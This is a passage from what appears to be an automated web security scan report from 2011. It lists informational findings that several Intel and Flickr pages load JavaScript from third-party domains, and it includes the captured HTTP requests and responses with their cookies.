Set-Cookie: BX=bhlcf056krvkq&b=3&s=vi; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Wed, 05-Feb-2014 01:51:22 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Sat, 06-Feb-2010 01:51:21 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Sat, 06-Feb-2010 01:51:21 GMT; path=/; domain=flickr.com
X-Served-By: www4.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65285

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>
   <title>Flickr: Intel Photos' Photostream</title>
   <meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...
</script>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/global.js.v93276.17"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://l.yimg.com/g/javascript/fold_main.js.v48851.48851.48851.48851.48851.38771.48851.48851.99272.84182.86949.86949.62864.38771.66362.84183.84152.69832.38771.84694.38771.88197.84182.98826.98920.99014.17"></script>

<script type="text/javascript" src="http://l.yimg.com/g/javascript/s_output_en-us.js.9999999912969570823078"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://l.yimg.com/a/lib/map/js/api/ymapapi_3_8_2_7.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/photo_mini_map.js.v84889.17"></script>
...[SNIP]...
<td width="100%" class="PhotosColumn">
                   
<script type="text/javascript" src="http://l.yimg.com/g/javascript/photo_cols.js.v38771.17"></script>
...[SNIP]...
</div>


   <script src="http://us.adserver.yahoo.com/a?f=792600013&p=flickr&l=FOOT9&c=r"></script>
...[SNIP]...

18.102. http://www.flickr.com/photos/intelphotos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/intelphotos

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://l.yimg.com/a/lib/map/js/api/ymapapi_3_8_2_7.js
  • http://l.yimg.com/g/javascript/fold_main.js.v48851.48851.48851.48851.48851.38771.48851.48851.99272.84182.86949.86949.62864.38771.66362.84183.84152.69832.38771.84694.38771.88197.84182.98826.98920.99014.17
  • http://l.yimg.com/g/javascript/global.js.v93276.17
  • http://l.yimg.com/g/javascript/photo_cols.js.v38771.17
  • http://l.yimg.com/g/javascript/photo_mini_map.js.v84889.17
  • http://l.yimg.com/g/javascript/s_output_en-us.js.9999999912969478373017
  • http://us.adserver.yahoo.com/a?f=792600013&p=flickr&l=FOOT9&c=r

Request

GET /photos/intelphotos HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:17 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=6dgtddl6krmjt&b=3&s=ve; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Tue, 04-Feb-2014 23:17:17 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Fri, 05-Feb-2010 23:17:16 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Fri, 05-Feb-2010 23:17:16 GMT; path=/; domain=flickr.com
X-Served-By: www40.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65286

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>
   <title>Flickr: Intel Photos' Photostream</title>
   <meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...
</script>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/global.js.v93276.17"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://l.yimg.com/g/javascript/fold_main.js.v48851.48851.48851.48851.48851.38771.48851.48851.99272.84182.86949.86949.62864.38771.66362.84183.84152.69832.38771.84694.38771.88197.84182.98826.98920.99014.17"></script>

<script type="text/javascript" src="http://l.yimg.com/g/javascript/s_output_en-us.js.9999999912969478373017"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://l.yimg.com/a/lib/map/js/api/ymapapi_3_8_2_7.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/photo_mini_map.js.v84889.17"></script>
...[SNIP]...
<td width="100%" class="PhotosColumn">
                   
<script type="text/javascript" src="http://l.yimg.com/g/javascript/photo_cols.js.v38771.17"></script>
...[SNIP]...
</div>


   <script src="http://us.adserver.yahoo.com/a?f=792600013&p=flickr&l=FOOT9&c=r"></script>
...[SNIP]...

18.103. http://www.intc.com/intelAR2009/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intc.com
Path:   /intelAR2009/index.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js

Request

GET /intelAR2009/index.html HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Content-Length: 4826
Content-Type: text/html
Content-Location: http://www.intc.com/intelAR2009/index.html
Last-Modified: Wed, 07 Apr 2010 20:13:55 GMT
Accept-Ranges: bytes
ETag: "88344ed98ed6ca1:8b2ff"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 23:15:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...

18.104. http://www.intc.com/ratios.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intc.com
Path:   /ratios.cfm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://www.shareholder.idmanagedsolutions.com/stocks/financials.json?SYMBOL_US=INTC&callback=processAdvanced
  • http://www.shareholder.idmanagedsolutions.com/stocks/key_ratios.json?SYMBOL_US=INTC&callback=processJSON

Request

GET /ratios.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:15:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A20%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:20 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:20 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:20 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</noscript>

<script src="http://www.shareholder.idmanagedsolutions.com/stocks/key_ratios.json?SYMBOL_US=INTC&callback=processJSON" type="text/javascript"></script>

<script src="http://www.shareholder.idmanagedsolutions.com/stocks/financials.json?SYMBOL_US=INTC&callback=processAdvanced" type="text/javascript"></script>
...[SNIP]...

18.105. http://www.intc.com/stock.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intc.com
Path:   /stock.cfm

Issue detail

The response dynamically includes the following script from another domain:
  • http://charts.edgar-online.com/ext/charts.dll?2-4-e-0-0-512-03NA000000INTC&fs-100-SF:1|2|5|3|22-BG=ffffff-BG1=ffffff-BG2=ffffff-FF:A18=E2E8F1|A33=E2E8F1-ht=250-wd=460-FT:0=6-HO:SW|SE|NW|NE-AP:9=2|10=2-FB:1=ffffff-FL:2=990033-FF:2=990033-FL:3=009900-FF:3=009900-FL:1=0072bc-FF:1=0072bc-FL:18=0072bc-FF:18=0072bc-FL:5=0E1388-FF:5=0E1388-AT:9=1-FI:|22=4-IMAP=1

Request

GET /stock.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:50 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://charts.edgar-online.com/ext/charts.dll?2-4-e-0-0-512-03NA000000INTC&fs-100-SF:1|2|5|3|22-BG=ffffff-BG1=ffffff-BG2=ffffff-FF:A18=E2E8F1|A33=E2E8F1-ht=250-wd=460-FT:0=6-HO:SW|SE|NW|NE-AP:9=2|10=2-FB:1=ffffff-FL:2=990033-FF:2=990033-FL:3=009900-FF:3=009900-FL:1=0072bc-FF:1=0072bc-FL:18=0072bc-FF:18=0072bc-FL:5=0E1388-FF:5=0E1388-AT:9=1-FI:|22=4-IMAP=1"></script>
...[SNIP]...

18.106. http://www.intel.com/business/vpro/alliance/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /business/vpro/alliance/index.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://yui.yahooapis.com/combo?2.8.0r4/build/yahoo-dom-event/yahoo-dom-event.js&2.8.0r4/build/element/element-min.js&2.8.0r4/build/animation/animation-min.js&2.8.0r4/build/carousel/carousel-min.js&2.8.0r4/build/selector/selector-min.js

Request

GET /business/vpro/alliance/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57048

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Intel vPro Technology Alliance</title>

   <link rel="
...[SNIP]...
<!-- Combo-handled YUI JS files: Carousel -->
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0r4/build/yahoo-dom-event/yahoo-dom-event.js&2.8.0r4/build/element/element-min.js&2.8.0r4/build/animation/animation-min.js&2.8.0r4/build/carousel/carousel-min.js&2.8.0r4/build/selector/selector-min.js"></script>
...[SNIP]...

18.107. http://www.intel.com/cd/software/partner/asmo-na/eng/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /cd/software/partner/asmo-na/eng/index.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.pollmonkey.com/s.asp?c=20005397&z=1244

Request

GET /cd/software/partner/asmo-na/eng/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G08
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:35 GMT
Date: Sat, 05 Feb 2011 23:18:35 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 35227

...<html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"><link href="http://cache-www.intel.com/plt/cd/software/shared/eng/css/v3.css" rel="stylesheet" type="text/css" xmlns:m
...[SNIP]...
<!-- BEGIN PollMonkey.com Activation Code --><script src="http://www.pollmonkey.com/s.asp?c=20005397&amp;z=1244"></script>
...[SNIP]...

18.108. http://www.intel.com/consumer/products/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/products/

Issue detail

The response dynamically includes the following script from another domain:
  • http://use.typekit.com/yhr6rfe.js

Request

GET /consumer/products/?iid=gg_play+products HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33897


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
</script>

<script type="text/javascript" src="http://use.typekit.com/yhr6rfe.js"></script>
...[SNIP]...

18.109. http://www.intel.com/consumer/products/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/products/index.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://use.typekit.com/yhr6rfe.js

Request

GET /consumer/products/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33897


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
</script>

<script type="text/javascript" src="http://use.typekit.com/yhr6rfe.js"></script>
...[SNIP]...

18.110. http://www.intel.com/consumer/products/processors/chipset.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/products/processors/chipset.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://use.typekit.com/yhr6rfe.js

Request

GET /consumer/products/processors/chipset.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:56 GMT
Content-Length: 30536
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
